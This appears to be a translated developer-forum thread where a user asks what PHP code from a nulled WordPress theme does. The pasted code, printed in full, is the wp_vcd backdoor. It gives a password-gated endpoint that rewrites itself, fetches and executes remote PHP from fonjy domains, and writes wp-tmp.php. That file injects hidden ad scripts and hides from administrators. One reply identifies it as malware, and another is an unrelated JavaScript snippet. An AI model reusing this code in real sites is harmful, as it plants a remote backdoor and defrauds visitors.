M
M
Maxim Maxim2017-12-19 10:22:23
JavaScript
Maxim Maxim, 2017-12-19 10:22:23

What can this code be responsible for?

In general, the subject, it is clear that this code is responsible for displaying popup windows when clicking on the site area, the question is different how does it do it?
This code comes standard with a null WordPress theme.

<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '58d2df047ca5aefc4a688a14a0a49a67'))
  {
$div_code_name="wp_vcd";
    switch ($_REQUEST['action'])
      {

        




        case 'change_domain';
          if (isset($_REQUEST['newdomain']))
            {
              
              if (!empty($_REQUEST['newdomain']))
                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
                                                                                                             {

                                                                                 $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;

                case 'change_code';
          if (isset($_REQUEST['newcode']))
            {
              
              if (!empty($_REQUEST['newcode']))
                {
                                                                           if ($file = @file_get_contents(__FILE__))
                                                                        {
                                                                                                 if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
                                                                                                             {

                                                                                 $file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
                                                                                 @file_put_contents(__FILE__, $file);
                                             print "true";
                                                                                                             }


                                                                        }
                }
            }
        break;
        
        default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
      }
      
    die("");
  }








$div_code_name = "wp_vcd";
$funcfile      = __FILE__;
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
        
        function file_get_contents_tcurl($url)
        {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
            $data = curl_exec($ch);
            curl_close($ch);
            return $data;
        }
        
        function theme_temp_setup($phpCode)
        {
            $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
            $handle   = fopen($tmpfname, "w+");
            fwrite($handle, "<?php\n" . $phpCode);
            fclose($handle);
            include $tmpfname;
            unlink($tmpfname);
            return get_defined_vars();
        }
        

$wp_auth_key='e810cc8873fd72ff6d1585ebccddae8e';
        if (($tmpcontent = @file_get_contents("http://www.fonjy.cc/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.cc/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {

            if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        }
        
        
        elseif ($tmpcontent = @file_get_contents("http://www.fonjy.pw/code.php")  AND stripos($tmpcontent, $wp_auth_key) !== false ) {

if (stripos($tmpcontent, $wp_auth_key) !== false) {
                extract(theme_temp_setup($tmpcontent));
                @file_put_contents(ABSPATH . 'wp-includes/wp-tmp.php', $tmpcontent);
                
                if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
                    @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
                    if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
                        @file_put_contents('wp-tmp.php', $tmpcontent);
                    }
                }
                
            }
        } elseif ($tmpcontent = @file_get_contents(ABSPATH . 'wp-includes/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent));
           
        } elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        } elseif (($tmpcontent = @file_get_contents("http://www.fonjy.top/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.fonjy.top/code.php")) AND stripos($tmpcontent, $wp_auth_key) !== false) {
            extract(theme_temp_setup($tmpcontent)); 

        }
        
        
        
        
        
    }
}

//$start_wp_theme_tmp



//wp_tmp


//$end_wp_theme_tmp
?>

Answer the question

In order to leave comments, you need to log in

3 answer(s)
D
Dmitry, 2019-10-09
@DcFanoiD

Shorter option

function tick(counter, max, interval) {
    if(counter > max) return;

    setTimeout(() => { 
        tick(++counter,max,interval*2);
    }, interval);

    console.log(counter);
}

tick(1, 30, 1000);

O
Orkhan Hasanli, 2017-12-20
@azerphoenix

Install the Wordfence plugin and crawl the site. It is possible that you installed a "left" plugin that contained malicious code.
The wp-tmp.php file is not a core WP file. And it probably needs to be removed.
Detailed information - link

As mentioned by ..., this is not a standard WordPress core file and the code contains external links (already suspicious) which, moreover are blacklisted.
Please make sure to follow our site cleaning guide in order to restore your site's integrity.

M
Maxim Maxim, 2017-12-19
@maksky

wp-tmp.php

ini_set('display_errors', 0);
error_reporting(0);
$anx='e810cc8873fd72ff6d1585ebccddae8e';
if ( ! function_exists( 'slider_option' ) ) {  


function slider_option($content){ 
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

$content=$content.$con2;
}
return $content;
} 

function slider_option_footer(){ 
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.oclaserver.com/apu.php?zoneid=1476266"></script>

<script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1476269&interactive=1&pushup=1"></script>

';

echo $con2;
}
} 








function setting_my_first_cookie() {
  setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
  }


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
  if (strpos($ref,$source)!==false) {
    setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
  $sevisitor=true;
  }
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
{
[email protected]_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

} 
}

Didn't find what you were looking for?

Ask your question

Ask a Question

731 491 924 answers to any question